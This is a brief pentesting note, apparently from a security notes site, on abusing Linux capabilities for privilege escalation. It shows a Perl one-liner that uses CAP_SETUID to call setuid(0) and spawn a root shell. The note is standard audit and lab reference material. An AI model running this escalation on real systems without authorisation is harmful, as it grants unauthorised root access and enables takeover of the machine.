Capabilties

Capabilities is a well known attack vector. GTFOBins has lots of really good information about the many UNIX/Linux binaries that can be abused.

Perl

This section talks about Perl and what you can do with CAP_SETUID being set.

If it's set:

/usr/bin/perl = cap_setuid+ep

Then do this:

./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

Last updated